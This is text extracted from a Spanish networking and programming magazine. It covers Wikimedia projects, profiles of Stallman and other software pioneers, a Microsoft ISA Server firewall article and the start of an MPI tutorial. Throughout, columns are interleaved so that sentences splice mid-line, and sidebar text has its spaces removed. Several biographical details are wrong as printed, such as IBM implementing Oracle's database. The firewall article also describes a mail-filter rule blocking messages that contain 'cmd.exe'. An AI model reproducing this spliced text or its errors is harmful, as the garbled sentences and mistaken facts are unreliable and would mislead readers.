de eliminar y restaurar páginas, y bloquear y los. Mediante un sencillo procesador de inquietudes, experiencias, y conocimientos.
desbloquear IP de usuarios anónimos entre texto, las acciones son generadas de forma El hecho de que la información pueda ser
otras acciones. Por último, los burócratas son inmediata. Y luego son advertidas en un publi-cada, actualizada y protegida por los
una clase especial de bibliotecarios, que espacio especial las modificaciones recientes. propios wikipedistas y bibliotecarios permite
gozan de cierta fuerza en el nombramiento Asimismo,Wikipedia no permite la reproduc- que el proyecto continúe y crezca,superando
de miembros. En la edición en español, hay ción de material con derechos de autor sin inclusive los límites del idioma, ya que en
más de 30 mil usuarios registrados como autorización, cosa que deriva en la elimi- Internet la geografía pasa a un segundo
wikipedistas, y 28 bibliotecarios. nación del escrito. Todas las contribuciones a plano. Con un millón de artículos, Wikipedia
Descripto como un concepto revolucionario, Wikipedia se publican bajo la licencia de doc- se ha transformado en la enciclopedia más
poderosa de Internet.
La lista que se presenta en la página público o que se hayan publicado No obstante, Bomis liberó su proyecto antes
de Wikimedia está compuesta de la con licencia GFDL (GNU Free de su explosión. A principios de 2002, la
siguiente manera: Documentation Licence). compañía analizaba la posibilidad de incor-
porar anuncios en el sitio web, pero llegado
- Wikilibros: Tiene como objetivo - Wikispecies: Es un nuevo proyecto
reunir libros de libre distribución, de Wikimedia, que invita a natural- el mes de agosto, dicho tema quedó en el
para fines educativos. Iniciado el 10 istas, zoólogos y científicos a partic- pasado; la enciclopedia cambiaba su
de julio de 2003 y abierta la versión ipar de una base de datos en la que dominio wikipedia.com por wikipedia.org.
en español en julio del año pasado, se pretende exponer animales, Más tarde, en junio de 2003, Bomis delegaba
este proyecto es una pieza clave de plantas, hongos, bacterias, y más. todos sus derechos sobre el proyecto a la
la Fundación. Fundación Wikimedia.
- Wikinoticias: En este caso, se trata
- Wikcionario: Consiste en la elabo- de una fuente de noticias en la que
ración de un diccionario multil- los propios miembros se mantienen La Fundación Wikimedia es una entidad sin
ingüe libre en todos los idiomas. El al día. Comenzó a funcionar el 29 de fines comerciales que comprende varios
mismo acompaña el contenido de enero de este año, y con 120 artícu- proyectos, entre los cuales aparece
Wikipedia, y desde mayo del 2004 los, todavía se trata de un sitio en Wikipedia. Para poder apoyar estos em-
se han recibido 1468 definiciones. pañales, pero muy conveniente. prendimientos, la Fundación ha recolectado
más de 100.000 dólares hasta el presente
- Wikisource: Cita textos originales - Wikiquote: Es una colección de
2005, principalmente mediante donaciones
escritos que sean de dominio frases célebres y proverbios.
individuales por debajo de los 50 dólares.

Revista de Networking y Programación / NEX - 13|


GENTE E HISTORIA EN IT

R i c h a r d S t a l l m a n

PorDavidAlejandroYanover
ElPadre
delsoftwarelibre
"Free as in Freedom ("Libre" como en "Libertad" y no "Gratis") , la cruzada de
Richard Stallman para un Software Libre", el título del libro de Sam Williams publi-
cado por O´Reilly en 2002,define a Richard Mathew Stallman.En este artículo inten-
tamos conocer un poco quién es y cuáles han sido sus contribuciones.

C
onocido por sus iniciales RMS, Symbolics, la cual intentaba activamente total y operativo: el sistema operativo
Richard Matthew Stallman es la cara reemplazar el software libre del laboratorio GNU/Linux (referido de manera errónea sim-
del movimiento del software libre. con su propio software privativo. Durante dos plemente como Linux).
Responsable de numerosas innova- años, de 1983 a 1985, Stallman, solo, duplicó Las motivaciones políticas y morales de
ciones dentro de la industria IT, Stallman los esfuerzos de los programadores de Richard Stallman le han convertido en una
difunde su visión por el mundo. Sus mayores Symbolics para impedir que adquirieran un figura controvertida. Muchos programadores
logros como programador incluyen el editor monopolio sobre los ordenadores del labora- de influencia que se encuentran de acuerdo
de texto Emacs, el compilador GCC, y el depu- torio. Por ese entonces, sin embargo, él era el con el concepto de compartir el código, di-
rador GDB, bajo la rúbrica del Proyecto GNU. último de su generación de hackers. fieren con las posturas morales, filosofía per-
Pero su influencia es mayor por el establec- Se le pidió que firmara un acuerdo de no di- sonal o el lenguaje que utiliza Stallman para
imiento de un marco de referencia moral, vulgación y que llevara a cabo otras acciones describir sus posiciones. Un resultado de estas
político y legal para el movimiento del soft- que él consideró traiciones a sus principios. En disputas condujo al establecimiento de una al-
ware libre, como una alternativa al desarr-ollo 1986, Stallman publicó el Manifiesto GNU, en ternativa al movimiento del software libre, el
y distribución de software privativo. Es el cual declaraba sus intenciones y motiva- movimiento del código abierto.
también inventor del concepto copyleft, un ciones para crear una alternativa libre al Stallman ha recibido numerosos premios y
método para licenciar software de tal forma sistema operativo Unix, el cual nombró GNU reconocimientos por su trabajo, entre ellos una
que este permanezca libre y su uso y modifi- (GNU es un acrónimo recursivo que significa membresía en la MacArthur Foundation en
cación siempre reviertan en la comunidad. "GNU No es Unix"), que también quiere decir 1990, el Grace Hopper Award de la Association
El padre del software libre nació el 16 de ñu en inglés (de ahí esos dibujos-logotipos). for Computing Machinery en 1991 por su
marzo de 1953 en Manhattan, Nueva York. Poco tiempo después se incorporó a la organi- trabajo en el editor Emacs original, un doctora-
Más tarde, en 1971, siendo estudiante de zación no lucrativa Free Software Foundation do honorario del Royal Institute of Technology
primer año en la universidad de Harvard, para coordinar el esfuerzo. Inventó el concep- de Suecia en 1996, el Pioneer award de la
Stallman se convirtió en un hacker del labora- to copyleft, el cual se utilizó en la Licencia Electronic Frontier Foundation en 1998, el Yuki
torio de Inteligencia Artificial (IA) del MIT. En Pública General GNU (conocida por sus siglas Rubinski Memorial Award en 1999, y el Takeda
los '80, la cultura hacker que constituía la vida en inglés GPL) en 1989.La mayoría del sistema Award en 2001. Por último, el año pasado
de Stallman, empezó a disolverse bajo la GNU, excepto el núcleo, se completó aproxi- recibió un Doctorado honorario otorgado en
presión de la comercialización en la industria madamente al mismo tiempo. En 1991, Linus nuestro país por la Universidad de Salta.
del software. En particular, otros hackers del Torvalds liberó el núcleo Linux bajo los térmi- Fuentes: - http://www.wikipedia.org
laboratorio de IA fundaron la compañía nos de la GPL, completando un sistema GNU - http://www.stallman.org

|14 - NEX / Revista de Networking y Programación Foto: www.wikipedia.com


GENTE E HISTORIA EN IT

1970

INNOVADORES
del software
E.F.Codd

PorNúriaPratsiPujol

UnospocoshanrevolucionadolaIndustriaIT.
Lospionerosdelatecnologíahanrealizado
suscontribucionesdesdegarajes,residencias
estudiantilesylaboratoriosdeinvestigación.
Enestaprimeraentrega,conocemosaquienes
haninnovadoelmundodelsoftware.

1969
"¿Quédeberíaexistir?
Paramí,esaeslapreguntamásexcitante
queunosepuedaimaginar".[1]
PaulAllen.
D.Ritchie

C
uando el editor me propuso el tema, formar parte del plantel de programadores de
me pareció interesante investigar las IBM. Luego de vivir en Canadá durante algún
vidas de los más destacados progra- tiempo, recibe el doctorado en Informática en
madores de la historia de la informáti- la Universidad de Michigan, en 1963. Continuó
ca. Gente que tuvo ideas innovadoras. Pero la trabajando para IBM, esta vez en California.
verdad es que fue más que eso. ¿Es que acaso no Durante las dos décadas siguientes, dedicó su
es lo más importante saber qué es lo que necesi- trabajo a teorías sobre el manejo de datos.Creó el
tamos? ¿Y si aparte de saberlo, desarrollamos un modelo relacional que derivó en la industria de
programa para saciar esa necesidad? Eso fue lo base de datos. Para su propia decepción, IBM no
que descubrí: estas personas habían tenido una explotó su sugerencia,implementando la base de
idea brillante y sabían como desarrollarla. datos de Oracle. El modelo estaba diseñado para
guardar información con una estructura simple
¿Se imaginan un mundo sin Unix,sin Windows o (tablas con columnas y filas, quizás algo trillado
sin Linux? ¿Qué sería hoy de las computadoras? hoy día pero no en aquel momento),y realizar pe-
queñas transacciones.
1969 A lo largo del artículo, presento los programas En 1984 deja IBM y establece dos compañías dedi-
que cambiaron la historia, las personas que cadas a los sistemas de manejos de datos. Ha
contribuyeron a desarrollarlos y sus ideas. hecho otras muchas contribuciones, aunque el
modelo relacional es que me más se destaca.
K.Thompson

Edgar Frank Codd Falleció en el año 2003.

Nació en 1923 en Portland, Inglaterra. Estudió Dennis M. Ritchie


matemáticas y química en la Universidad de
Oxford. Fue piloto durante la Segunda Guerra Nació en 1941 en Bronxville, Nueva York, EE.UU.
Mundial y en 1948 se mudó a Nueva Cork para Estudia física y matemáticas y recibe el doctorado a

|16 - NEX / Revista de Networking y Programación


1975
los 27 años en la prestigiosa Universidad de Harvard. a tener serios problemas económicos, e impre-
En 1967 comienza a trabajar en Bell Labs siguien- sionados por las habilidades de ambos, Allen y
do los pasos de su padre, dueño de una reconoci- Gates fueron contratados para encontrar y
da trayectoria en la empresa. Participa en el solucionar debilidades en el sistema.
proyecto Multics, y más tarde colabora con Pocos años después, ya no era la amistad lo
Thompson en la creación de Unix. Contribuyó único que los unía, ya que decidieron fundar la

P.Allen
también a demostrar la portabilidad, que hizo de primera compañía Traf-O-Data hasta que
Unix un sistema operativo tan popular, basado en comenzaron la Universidad.
su potencia y versatilidad. Paul Allen comenzó sus estudios en la
Introduciendo nueva sintaxis al lenguaje B de Universidad de Washington, estudios que
Thompson, creó el lenguaje de programación C. luego abandonará para alentar a Gates a abrir
Ha recibido premios y la Medalla de Tecnología de una compañía de software juntos: Microsoft, la
EE.UU.junto a Thompson. cual se ve forzado a abandonar en 1983 debido
Conocido como dmr en la jerga de Unix,es actual- a que se le diagnostica la enfermedad de
mente manager de un pequeño grupo de inves- Hodgkin's, tratado y recuperado exitosamente
tigadores en Bell Labs / Lucent Technologies.[2] de la misma.
En el 2000 renuncia a su cargo en Microsoft.
Kenneth Thompson Actualmente es uno de los hombres más ricos
del mundo, dueño de radios, un equipo de la
Nació en 1943 en Louisiana, EE.UU. A los 23 NBA y uno de fútbol americano. También in-
años, se graduó como Ingeniero Electrónico en vierte muchísimo dinero en proyectos de in-
la Universidad de California en Berkeley. vestigación (como lo ha hecho con el Instituto
Ken, como se lo conoce en la jerga de los usua- de Ciencia del Cerebro), arte y música. [4] 1975
rios Unix, comenzó trabajando en un proyecto
conocido como Multics. Se trataba de una pro- Bill Gates
ducción inmensa con muchísima gente traba-
jando en ella.El propósito era soportar miles de Nace en 1955 en Seattle, EE.UU. Funda
usuarios logueados cuando no se podía Microsoft en 1975 junto a Paul Allen. Todo
siquiera soportar tres.En 1969, se cansó de este comienza con una publicación de la Altair 8080

B.Gates
proyecto y decidió escribir su propio sistema (el primer kit de microcomputadora) en la
operativo. Una semana en el kernel, una revista Popular Electronics. Allí es donde ambos
semana en el file system y al cabo de un mes ven su oportunidad, intuyendo que el mercado
Ken tenía terminado Unix. de las computadoras personales explotaría. Es
La gente dijo: "si miles de personas escribieron así como diseñaron el lenguaje de progra-
Multics, entonces un sistema operativo escrito mación BASIC, y se lo venden a Altair (que en
por una sola persona debe se Unix". Gracias a ese momento carecía de software). Al año si-
su creación, a lo largo de los años sucesivos le guiente, Gates abandona sus estudios para
fueron entregados varios premios. [3] fundar Microsoft, que para 1980 se convertirá
Kenneth Thompson fue también quien escribió en la principal compañía dedicada a la industria
el lenguaje B, que es el precursos del lenguaje del software. Bill Gates es hoy día el hombre
C, desarrollado por Dennis M. Ritchie. más rico del mundo.Tiene mujer y tres hijos. [5]
En el año 2000 se retira de Bell Labs y actual-
mente es miembro de Entrisphere, Inc. Bill Atkinson
Se graduó en la Universidad de San Diego, en
Paul Allen California. Trabajó para Apple Computers. Su
trabajo en QuickDraw durante los años 70s y 1983
Nacido en 1953 en Seattle, EE.UU.A los 14 años 80s, sirvieron para sentar las bases de Lisa y
conoció en el colegio a Bill Gates, donde Macintosh. La magnífica performance de GUI
comenzaron a descubrir el mundo de la com- es mérito de su trabajo. Fue también el creador
putación. Afortunadamente para ellos, la de MacPaint, la primera aplicación de Mac que
B.Atkinson

escuela había logrado comprar computadoras arrasó comercialmente, seguido por la


y rápidamente se convirtieron en hackers, HyperCard, el primer sistema de hipertexto
motivo por el cual fueron expulsados del popular. Su afición por la fotografía se convirtió
centro educativo. La compañía que había a partir de 1996 en su único empleo: fotógrafo
vendido las computadoras al colegio, comenzó de la naturaleza. [6]

Revista de Networking y Programación / NEX - 17|


Dave Cutler
1991 EXTRAS
Nacido en Michigan, EE.UU. en 1942, se recibe
de Ingeniero en la Universidad de Oliver. Con GUI
un enorme interés por los sistemas operativos,
comienza a trabajar en Digital en 1975 en di- SonlassiglasdeInterfaz
ferentes proyectos, que derivan luego en los GráficadelUsuario(Graphical
L.Tor valds

sistemas operativos VAX/VMS, VMS y VAXELN. UserInterface).Setratadeun


Hoy considerado como uno de los progra- programaquehaceusodelas
madores más exitosos del mundo, es Ingeniero capacidadesgráficasdelacom-
en Microsoft Corp. desde 1988. Participó en el putadora,conelfindeproveer
desarrollo de Windows NT como co-líder de alusuariodeunainterfaceque
proyecto y sus tres versiones siguientes, in- lepermitacomunicarseconel
cluyendo Windows 2000. sistemaoperativodeuna
"El tamaño de las bases de datos ha crecido manerasencillayamigable.
hasta un punto donde no podemos obtener la Estohacequeusuariosnoex-
performance de sistemas de 32 bits, y debemos perimentados,seveanlibrados
movernos a sistemas de 64 bits", comenta delanecesidaddeescribiren
Cutler. Y es en ello en lo que trabaja actual- pantallacomplicadoscomandos
mente: la versión de 64 bits de Windows XP y paraoperarunacomputadora.
Windows 2003 Server.
Forbes
Linus Torvalds
LarevistaForbes(unadelasre-
Nació en Helsinki (Finlandia), en 1969 y se vistasdeeconomíamáspresti-
graduó en la Universidad de Helsinki en giosasdelmundo)realizaun
Informática. El título de su tesis fue: "Linux, un rankingdeloshombresmás
sistema operativo portable". ricosdelmundocadaaño.Para
Inspirado en Minix, desarrolló parte del kernel el2004,lalistadeloshombres
de Linux. Su propósito era desarrollar un másricosenEE.UU.comienza
sistema operativo robusto como Unix, pero conBillGates,estandoPaul
que pudiera correr en una PC hogareña. A Allenen3er.lugar.Lalistacon-
pesar de haber escrito tan sólo el 2% del tinúaydentrodeltop50están
código del actual kernel de Linux, sigue siendo MichaelDellylosdueñosde
la última autoridad en lo que respecta a este Google[8].
desarrollo open-source.
A diferencia de muchos miembros de la comu- NúriaPratsiPujol
nidad open-source, Linus Torvalds mantiene un
perfil bajo,como se puede ver en su página web.[7] Esconsultoraenprogramación
Está casado, tiene 3 hijas y vive en EE.UU. debasesdedatos.Enlaactuali-
Trabajó en Transmeta Corp. desde 1997 hasta dad,realizasudoctoradoen
2003, y trabaja actualmente en Open Source FísicaTeóricaenlaUniversidad
Development Labs. deBarcelona,España.Sela
Juntos, GNU/Linux (el proyecto de fuentes a- puedecontactaren
biertas y su sistema operativo), han revolu- nuriapip@nexweb.com.ar
cionado el mundo de IT.

Web-biografía:

[1] http://www.paulallen.com
[2] http://cm.bell-labs.com/who/dmr/index.html
[3] http://www.bell-labs.com/history/unix/thompsonbio.htm
[4] http://www.research.ibm.com/resources/news/20030423_edgarpassaway.shtml
[5] http://www.microsoft.com/billgates/
[6] http://www.billatkinson.com/aboutTheArtist.html
[7] http://www.cs.helsinki.fi/u/torvalds/
[8] http://www.forbes.com/lists

|18 - NEX / Revista de Networking y Programación


MICROSOFT

Microsoft
ISA Server Mucho más que un firewall tradicional
POR MARCELO C. A. ROMEO

Actualmente, la mayor preocupación de las empresas está sin Services y varios clientes de mensajería in-
dudas relacionada con la cantidad de correo basura entrante stantánea, por sólo nombrar algunos. Cada
uno de estos tipos de contenido http, repre-
(spam), como así también el potencial peligro que implica abrir un senta un potencial peligro para nuevos tipos
mensaje de email que contenga en su interior algún virus o de exploits, buffer overflows y demás agu-
gusano. Pero ninguna empresa puede hoy día prescindir del correo jeros de seguridad. Lo que es contenido
electrónico; absolutamente todos, desde el primer al último em- OWA, por ejemplo, va encriptado con SSL
pleado, hacen uso de los servidores internos de Exchange para (Secure Socket Layer). Y los firewalls tradi-
cionales son incapaces de detectar ataques
tener acceso a sus cuentas de email. En lo que a seguridad se que viajan por SSL.
refiere, otorgar ese acceso se vuelve a menudo una tarea suma-
mente compleja para administradores y usuarios. UnamiradaaISAser ver.

Siempre existe la opción de brindar acceso fase gráfica diferente. Por otro lado, OWA hace Microsoft's firewall, Internet Security and
remoto al Exchange por medio de una VPN uso del Internet Information Server (IIS), lo Acceleration (ISA) Server 2000, brinda el clásico
(Virtual Private Network), si bien esto le com- que implica la implementación de otro nivel packet filtering y stateful inspection optimiza-
plica la vida al usuario y no deja de implicar de seguridad más. Un firewall con packet fil- do con un filtro para la capa de aplicación, que
importantes riesgos. No olvidemos que un tering y stateful inspection (capa 4 en el le permite defenderse contra ataques a la capa
cliente VPN se conecta externamente a una modelo OSI) es poco lo que pude hacer por de aplicaciones que viajen en paquetes encrip-
red interna, gozando de los mismos privile- proteger a un IIS server contra los ataques ac- tados bajo SSL.Esta es una tarea que la mayoría
gios y accesos a recursos tal como si estuviera tuales (Code Red, Nimbda, Goner, etc.), ya que de los firewalls son incapaces de realizar.
conectado localmente. Y a menos que se im- estos utilizan para sus fines la capa de apli- Cuando un cliente envía un requerimiento
plementen controles adicionales, la privaci- cación (capa 7 en el modelo OSI). https (http con SSL) a un servidor Web protegi-
dad de nuestra VPN puede siempre verse Un firewall común con packet filtering y state- do con ISA Server, éste se encarga de desen-
comprometida no sólo por hackers, sino ful inspection, controla el destino y el puerto de criptar los paquetes y procede luego a inspec-
también por proveedores, business partners y todo paquete entrante y se lo pasa al servidor en cionarlos. Una vez realizada la inspección, ISA
todo aquel que tenga acceso externo al la red interna. Aún así, los ataques actuales Server envía los paquetes válidos al servidor
Exchange o a la Intranet. viajan dentro de estos paquetes. Hasta no hace Web interno vía http o https. Luego de recibir
El acceso remoto vía Exchange Outlook Web mucho (tan sólo unos pocos años), los únicos respuesta por parte del servidor, ISA Server
Access (OWA) soluciona sólo parte del proble- paquetes que viajaban por puerto 80 eran de hace un reply al cliente por medio de una
ma, con el costo de limitar la funcionalidad y tráfico Web. Hoy día, además del tráfico Web, conexión https. Este nivel de seguridad se
tener que acostumbrar al usuario a una inter- por el puerto 80 pasan OWA, XML Web vuelve crucial para las empresas de hoy. Su in-

|20 - NEX / Revista de Networking y Programación


creíble arquitectura y escalabilidad, permiten ISA Server al Active
que Microsoft -o cualquier otro fabricante de Directory, de forma tal
software- puedan desarrollar plugins para apli- que las políticas de se-
caciones específicas. guridad puedan ser
creadas sobre los
Funcionalidad. usuarios y grupos ya
existentes en el Active
ISA Server hace frente a la baja en la perform- Directory.
ance que genera el filtrado en la capa de apli- ISA Server soporta
caciones, usando caching reverso y escalabili- tres tipos de configuraciones de red. En la
dad. ISA Server cachea el contenido solicitado primera (Fig.1), tenemos un ISA Server con dos
con mayor frecuencia por el Web server y le de- placas de red, una conectada a Internet y la
vuelve el contenido al cliente directamente otra a la red interna. En este caso, no se
desde la RAM, sin necesidad de recurrir al Web dispone de una DMZ (DeMilitarized Zone) con
server. En cuanto a la escalabilidad se puede servidores accesibles desde Internet. En la
optar por un solo servidor de alto rendimiento, Fig.2, tenemos un ISA Server con 3 placas de
o utilizar varios servidores de rendimiento red. La tercera placa es la que conecta con la
medio que hagan balanceo de carga (load-ba- DMZ. A este tipo de configuración se la de-
lanced ISA Servers). Microsoft ofrece la posibil- nomina "three-homed DMZ". En la Fig.3
idad de probar gratuitamente una versión del tenemos dos ISA Servers uno "externo" y otro
ISA Server limitada a 6 meses de uso, realizan- "interno", cada uno con dos placas de red. El
do la descarga de dicho programa desde ISA Server "externo" conecta Internet con la
http://www.microsoft.com/isaserver. DMZ, mientras que el "interno" conecta la
ISA Server se ejecuta en tres modos básicos: DMZ con la red interna. Esta configuración se fig. 1
cache, firewall o integrado. En el modo cache, conoce con el nombre de "back-to-back DMZ".
ISA Server sólo funciona como caching server, En ISA Server, cada placa de red se designa está habilitada en función de proteger la red
sin funcionalidad como firewall. Podemos como "externa" o "interna" y se definen en la interna. Por eso, en la figura Fig.2 correspon-
hacer cache del contenido más solicitado por LAT (Local Ardes Table). En la LAT están inclu- diente a la configuración denominada "three-
nuestros usuarios, como así también idas todas las IP de las subredes de la red homed DMZ", el firewall de ISA Server sólo
aprovechar la propiedad que posee ISA Server interna. Por lo tanto, ISA Server clasifica como brinda protección de packet filtering y stateful
de hacer caching reverso para acelerar la interna toda placa de red cuya dirección IP inspection a la DMZ. En las otras dos configura-
entrega de los contenidos desde el Web site figure en la LAT; las demás, son clasificadas con ciones de red, en cambio, ISA Server provee de
hacia otros usuarios. En el modo firewall, ISA externas. La capacidad de ISA Server de hacer esta misma protección tanto a la DMZ como a
Server funciona exclusivamente como firewall, firewall a nivel de la capa de aplicaciones, sólo la red interna.
sin la capacidad de hacer caching. En modo in-
tegrado, tal cual indica su nombre, ISA Server
hace uso de ambas funcionalidades a la vez.
Cabe destacar la posibilidad de poder integrar

Stateful Inspection

También conocido como filtrado diná-


mico de paquetes (Dynamic Packet
Filtering).Setratadeunaarquitectura
defirewallquetrabajaaniveldelacapa
dered(networklayer).Adiferenciadel
filtrado estático de paquetes (Static
Packet Filtering), que examina un
paquete en base a la información con-
tenidaenelheader,elfiltradodinámico
realizaunexamendetalladonosólodel
header, sino también de todo el con-
tenido del paquete. De esta forma se
asegura la validez integral de dicho
paquete, en lugar de obtener sola-
mente datos acerca de la fuente y el
destinodelmismo.
fig. 2

Revista de Networking y Programación / NEX - 21|


ProtegiendoExchangeSer ver. filtro SMTP se asegura de cuáles son los co-
mandos permitidos y durante cuanto tiempo
Además de la protección a nivel de capa 4, dichos comandos son permitidos. También
podemos usar ISA Server para proteger a podemos potenciar la arquitectura de ISA
Exchange Server de cuatro formas distintas. En Server mediante agregados (add-ons) exter-
primer lugar, podemos hacer uso del filtro de nos de Symantec y Trend Micro's InterScan
SMTP que ISA Server trae incorporado. Como WebProtect, en lo que hace al escaneo de
segunda opción, podemos implementar virus. Hay más información disponible acerca
Exchange Remote Procedure Call (RPC) filter- de los mismos en http://www.microsoft.com
ing. La tercera es, si usamos OWA, utilizar el fil- /isaserver/partners/contentsecurity.asp.
trado de http de ISA Server para proteger al IIS La configuración de ISA Server para recibir
Server. Como cuarta y última opción, ISA correo entrante SMTP, escanearlo y enviarlo al fig. 3
Server trae incorporado un filtro POP (Post Exchange Server, se realiza mediante la
Office Protocol), que chequea constantemente consola de administración (MMC) de ISA
el tráfico POP para impedir ataques del tipo Server, haciendo clic con el botón derecho del
buffer overflow. Implementando el filtro de mouse sobre Server Publishing Rules, y selec- Wizard, nos solicitará la dirección IP de nuestro
SMTP del ISA Server entre Internet y el cionando la opción "Secure Mail Server". Esto servidor interno de SMTP y la dirección IP
Exchange Server, podemos levantar un ejecutará el Mail Server Security Wizard pública o externa de nuestro dominio DNS.
perímetro de defensa a nivel de capa 7 que (Fig.4). A continuación, seleccionaremos la au- Esta dirección externa, debe ser una de las
impida el acceso de spam y todo mail dañino tenticación por default para SMTP, y nos ase- configuradas para el ISA Server. El mismo
al interno de nuestra red. Se puede filtrar el guraremos que la opción de filtrado de con- Wizard se encarga de generar la Regla de
SMTP por remitente, nombre de dominio, pa- tenido (content filtering) se encuentre tildada. Publicación del Servidor (Server Publishing
labras clave, tamaño de los adjuntos, etc. Para Esto merece especial atención, porque de no Rule) y la mapea al filtro SMTP.
protegerse de ataques a través del protocolo estar tildada esa opción el filtro SMTP quedará Siguiendo adelante, en "Extensions" selec-
SMTP (que pueden causar buffer overflow), el inactivo. Siguiendo adelante a lo largo del cionaremos la carpeta de Filtro de
Aplicaciones (Application Filters), y hacemos
doble click sobre SMTP Filter. En la solapa
"Attachments" (adjuntos) podemos borrar,
reenviar o retener mensajes en base al nombre
de los archivos adjuntos, su extensión o
tamaño/peso (Fig.5). La retención o reenvío de
mensajes nos da la posibilidad de permitir en
forma selectiva la entrega de mensajes con
adjuntos que se encuentran normalmente blo-
queados, a aquellos usuarios que realmente
los necesitan. A pesar de que el filtro SMTP no
analiza internamente archivos tipo .zip en
busca de contenido nocivo, hay varios plugins
tanto para ISA Server como para Exchange que
nos proveen dicha funcionalidad. Por eso, con-
sideremos el filtro SMTP de ISA Server como
nuestra primera línea de defensa.
La figura 6 nos muestra el filtro SMTP configu-
rado para rechazar cualquier mensaje que
contenga "cmd.exe" en cualquier lugar del
mensaje. Podemos implementar el uso de
reglas para el filtrado de mensajes en base a
determinadas palabras contenidas en el
mensaje, pero vale aclarar que debemos ser
fig. 4 más que cuidadosos al respecto.

|22 - NEX / Revista de Networking y Programación


fig. 5 fig. 6
PROGRAMACION

MPI
MessagePassingInterface,laHerramienta
deProgramaciónenParaleloenClusters
paraComputacióndeAltoRendimiento.
POR EL DR. REINALDO PIS DIEZ
ElpresenteartículonosdaunaexcelenteintroducciónaltemadeHPC
(HighPerformanceComputing,ComputacióndeAltoRendimiento).
HPC es hoy usado en aplicaciones tan diversas como investigación
científicabásica,diseñodeautos,simulacionesnuméricasenindustria
química,farmacéuticaymedicinal,industriadeserviciosfinancieros,
etc. Procesamiento paralelo y la herramienta de programación MPI
son actualmente un "estándar". El tema es complejo y difícil de ex-
plicaraNOespecialistas.Consoloaceptarlaideageneraldealgunos
conceptosmatemáticosqueseintroducenparaejemplificar,elartícu-
losevuelveclaroeinstructivo.Esperamosacepteeldesafío.

L
Los clusters para computación de tos y nuestro cluster está compuesto por 10
alto rendimiento (High Performance nodos. En lugar de saturar un nodo del cluster
Computing, HPC) han sido diseña- con toda la tarea, disponemos el proceso de
dos para llevar a cabo operaciones forma que la suma de los primeros 10.000 pro-
de cálculo que demandan importantes requeri- ductos sea rea-lizada en el primer nodo,la suma
mientos computacionales [1]. Un valor agrega- de los productos 10.001 a 20.000 se lleve a cabo
do en los clusters HPC es la posibilidad de efec- en el segundo nodo y así sucesivamente hasta
tuar procesos en paralelo, es decir, utilizar si- que la suma de los productos 90.001 a 100.000
multáneamente más de un nodo del cluster las realice el décimo nodo. El primer nodo
para resolver el problema en cuestión. recibe las sumas parciales de los nueve nodos
La paralelización de un algoritmo no es tarea restantes, efectúa la suma final y reporta el re-
trivial ya que requiere que las tareas que serán sultado. Idealmente, el proceso paralelizado
distribuidas entre los nodos del cluster sean debe consumir la décima parte del tiempo que
completamente independientes unas de otras. consumiría en un único nodo.
El ejemplo más sencillo de un proceso fácil- Ahora bien, programar un producto escalar en
mente paralelizable es el producto escalar de lenguajes como Fortran (77, 90 o 95), C o C++
dos vectores A = {a1, a2, ..., aN} y B = {b1, b2, ..., es un ejercicio que no requiere más de 10 líneas
bN}. El producto escalar A"B se define según: de código. Sin embargo, ¿cómo logramos para-
A"B = a1 · b1 + a2 · b2 + ... + an · bn
lelizar el algoritmo? Aquí es donde entran en
acción los entornos de programación en parale-
Ya que cada producto del tipo ai · bi es indepen- lo que no son otra cosa que bibliotecas de fun-
diente de los otros, puede ser realizado por un ciones que llevan a cabo la comunicación y el
nodo determinado sin que las tareas efectu- pasaje de información entre nodos.
adas por los otros nodos interfieran con ella. Se acepta en la actualidad la existencia de tres
Para ser más específicos, supongamos que métodos para programar en paralelo: message
nues-tros vectores contienen 100.000 elemen- passing, distributed data structures y live data

Foto: © 2005 Hemera Technologies Inc.


structures.Cada método se basa en conceptos d- mpi.h.Este contiene los valores de constantes y En nuestro segundo ejemplo, calculamos el
iferentes acerca del rol de los procesos y la dis- tipos de datos predefinidos necesarios por las logaritmo natural de 2 usando la serie S (-1)i /
tribución de datos.Se recomienda la lectura de la funciones de biblioteca de MPI. (i + 1) donde el índice de la suma, i, corre desde
referencia [2] para mayores detalles sobre los di- MPI_Init debe ser la primera función invoca- 0 hasta 8. El código se muestra en la figura 2.
ferentes métodos de programación en paralelo. da por el programa principal, mientras que Vemos que luego de las llamadas a las mismas
El método de message passing es tal vez el más MPI_Finalize debe ser la última función invo- funciones que el ejemplo anterior se pide al
difundido de los tres citados anteriormente. cada por todos los procesos iniciados, usuario que ingrese el número de términos de
Existen entornos de programación gratuitos excepto cuando alguno de éstos encuentre la serie con la cual se estimará el logaritmo
que se adaptan a la filosofía de message un error irreparable, en cuyo caso la función a natural de 2. Lo interesante de este if es que el
passing.Uno de ellos es Parallel Virtual Machine invocar será MPI_Abort. proceso que inició el programa, es decir aquel
(PVM) [3] desarrollado a mediados de 1989 en Las funciones MPI_Comm_size y con rango 0, es quien lo lleva a cabo y no otro.
el Oak Ridge National Laboratory. Otro es MPI_Comm_rank determinan el número de La función MPI_Bcast se encarga de hacer
Message Passing Interface (MPI) [4] que "vio la procesos requeridos y le asignan un número de conocer al resto de los procesos la información
luz" en 1992 (ver "MPI - un poco de historia") y orden o rango (desde 0 a nro_procesos - 1) a relevante para poder resolver la serie. En el
hoy se nos presenta en dos flavors: MPICH [5] y cada uno, respectivamente. La constante lenguaje de message passing esta operación se
LAM/MPI [6]. También hay entornos de progra- MPI_COMM_WORLD hace referencia al con- conoce como one-to-all communication.
mación comerciales bajo el paradigma junto de procesos que han sido iniciados al eje- MPI_Bcast tiene cinco parámetros: la dirección
message passing como TCP-Linda [7]. No ob- cutar el programa y que pueden comunicarse de la variables que se estás transmitiendo; el
stante,el único que ha adquirido la categoría de unos con otros. número de variables que se transmite; el tipo
estándar en la actualidad es MPI y a él dedicare- La ejecución del programa utilizando, digamos, de cada variable que se transmite; el rango del
mos el resto del artículo. cuatro procesadores es la siguiente: proceso que está efectuando la transmisión y,
Asumimos de ahora en más que el lector posee Un saludo desde el procesador 1 de un finalmente, el conjunto de procesos involucra-
total de 4
conocimientos básicos de programación en Un saludo desde el procesador 2 de un dos en la tarea. Es interesante notar que MPI
lenguaje C. Asimismo, no nos detendremos en total de 4 define tipos para las variables que se corres-
el proceso de instalación de las versiones de Un saludo desde el procesador 3 de un ponden con los tipos estándar del C, así,
total de 4
MPI ni en la forma de compilar y ejecutar los Un saludo desde el procesador 4 de un MPI_INT es equivalente a la declaración int.
programas sino que analizaremos algunas de total de 4 Obsérvese los argumentos del for siguiente:
las funciones básicas de la biblioteca MPI [8].
De todas formas, el funcionamiento de los pro- Fig. 2
gramas que se muestran ha sido chequeado u-
#include <stdio.h>
tilizando la versión 1.2.5 de MPICH. #include "mpi.h"
Nuestro primer ejemplo consiste en el clásico
